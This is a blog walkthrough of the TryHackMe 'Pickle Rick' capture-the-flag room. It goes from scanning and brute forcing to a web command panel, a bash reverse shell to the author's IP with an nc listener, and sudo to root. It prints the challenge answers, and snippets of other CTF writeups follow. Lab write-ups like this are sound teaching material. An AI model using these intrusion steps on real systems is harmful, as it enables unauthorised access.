Skip to main content

TryHackMe - PickleRick

 

TryHackMe - Pickle Rick



The first step for any such challenge is to scan the server by nmap. I generally use the options: -A and -T4 however you can also use NSE along with it by adding –script=vuln. This gives us a lot of input and we have to look for relevant information in it. But on the plus side it sometimes provides us with valuable information.



 

2.      Now I knew that it has a webpage since port 80 is open. Then I checked its robots.txt file and found a string: Wubbalubbadubdub

At this point we don’t have any information about what this string could be so just make a note of it as of now and move on.

 

3.      Then I checked the source code of the homepage given to us and it contained some interesting info. It gave us a username: R1ckRul3s

At this time I had a hunch that the above string could actually be a password for something.



 

4.      My next step was to use dirbuster for locating hidden files and directories on the server. This led me to a login page



 

5.      Next step is pretty clear. To use the username as R1ckRul3s and try password as Wubbalubbadubdub to see if we can log into the server.

To tell you the truth I actually used hydra to brute force the password from rockyou.txt wordlist and after a minute it clicked me that maybe that string was the password all along. And it actually was.

 

6.      Logged in. At this point we see a text field for writing commands and typing ls into it made me realize that we can directly write linux commands into it.



7.      You must be thinking that easy peasy we can just cat the file to view its contents. But nope



 

8.      But we do have some alternatives for cat. And less worked perfectly. So, by using the command less Sup3rS3cretPickl3Ingred.txt we get our 1st ingredient: mr. meeseek hair

 

9.      Since I basically have an SSH into the server, I started to look around into the home folder.

 



 

10.  Just like before I used less to open this file and found our 2nd ingredient: 1 jerry tear



 

11.  After this step I realized that maybe I’m not logged in as the root user. So I checked it with the whoami command and I actually was the www-data user.

12.  At this point the only thing in my mind was privilege escalation. So I tried to see if there’s some info about any command that I’m not allowed to execute. The command I used is sudo -l



 

13.  The line (ALL) NOPASSWD: ALL means that I’m allowed to run every command which would have required a password without one. That means running sudo without a password. So I tried sudo bash to get a root account but that did not work.

14.  The next thing I had in mind was to try this again but from a terminal this time. So I used a reverse shell to obtain a shell on terminal. For this I went to gtfobins(gtfobins.github.io) and searched for bash à reverse shell and found the following code which I modified according to my use case

bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'

so this became

bash -c 'exec bash -i &>/dev/tcp/<my_ip_address>/12345 <&1'

 

15.  Then I opened port 12345 for listening on a terminal window with the following command: nc -lvnp 12345.

16.  Finally I ran the reverse shell code on the site. And voila. I got a shell on the terminal.



 

17.  Then I ran bash sudo and finally got root access on the system. At the end of this challenge I looked into the root folder and printed the only file there which is our 3rd ingredient: fleeb juice



Labels:

Comments

Post a Comment

Popular posts from this blog

Hacktober CTF - Writeup

  HACKTOBER CTF   This post contains the writeups for: l  Crypto n  Hail Caesar n  Down The Wrong Path l  Forensics n  Captured Memories n  Amcaching In n  Prefetch Perfection n  Prefetch Perfection 2 l  Linux n  Talking to the dead 1 n  Talking to the dead 2 l  Programming n  Message in an array n  Trick or treat l  Steganography n  You believe in ghosts n  Start digging n  Blasphemy   1 OSINT         n Creeping 1        n  Creeping 2         n Creeping 3         n Past Attacks       Hail Caesar In this question we have to decrypt TGG KUSJWV QGM and the question gives us a hint that its a caesar cipher. Although we don’t know the key but we really don’t need one for this. Loading it up in dcode gives us the answer as BOO SCARED YOU   And thus the flag is flag{ BOO SCARED YOU }           Down The Wrong Path The given image shows a transposition cipher.   So reading it in a similar fashion results in this message: REMEMBER TO TELL SPOOKYBOI ABOUT THE NEW TARGETS OF OUR NEXT ATTACK   So
2 comments
Read more

CyberYoddha CTF - Writeup

  This blog post contains the writeups for the following challenges :- Misc Lorem Ipsum Forensics Image Viewer The row beneath What's the password Steg 2 Steg Ultimate Cryptography Beware the Ides of March Sus Reverse Engineering Password 1 Trivia Trivia 1 Trivia 3 Trivia 4 Trivia 5 Trivia 7 Trivia 8 LOREM IPSUM The given text when googled will give you the original text and you'll realise that the given text has some additional characters attached to some words. Lorem ipsum dolor/c/ sit amet, consectetur/y/ adipiscing /c/elit, sed do/t/ eiusmod tempor inci/f/didunt ut labore et dolore magna aliqua/l/. Ut enim ad minim/a/ veniam, quis/t/ nostrud exercitation ullamco/i/ laboris nisi/n/ ut aliquip ex ea/i/ commodo/s/ consequat. Duis /c/aute irure dolor in reprehenderit in voluptate velit /o/esse cillum dolore eu fugiat nulla pariatur. Excepteur /o/sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim /l/id est laborum. Extracting all these character
2 comments
Read more

C4ptur3-th3-fl4g Walkthrough

TryHackMe c4ptur3-th3-fl4g Walkthrough Task - 1 Translation and Shifting Question 1 -  c4n y0u c4p7u23 7h3 f149? Solution -  This one's quite simple. This is called leet in which the text is written with modified spellings with the help of numbers in place of some characters. The answer for this one is - can you capture the flag? Question 2 -  01101100 01100101 01110100 01110011 00100000 01110100 01110010 01111001 00100000 01110011 01101111 01101101 01100101 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01101111 01110101 01110100 00100001 Solution -  This is written in binary as you can see that every set of 1's and 0's (separated by space) is a string of 8 numbers. So you can use any online resource such as  rapidtables  to convert binary to ascii. The answer for this is -  lets try some binary out! Question 3 -  MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== HINT :  Having an equal sign at the end of
Post a Comment
Read more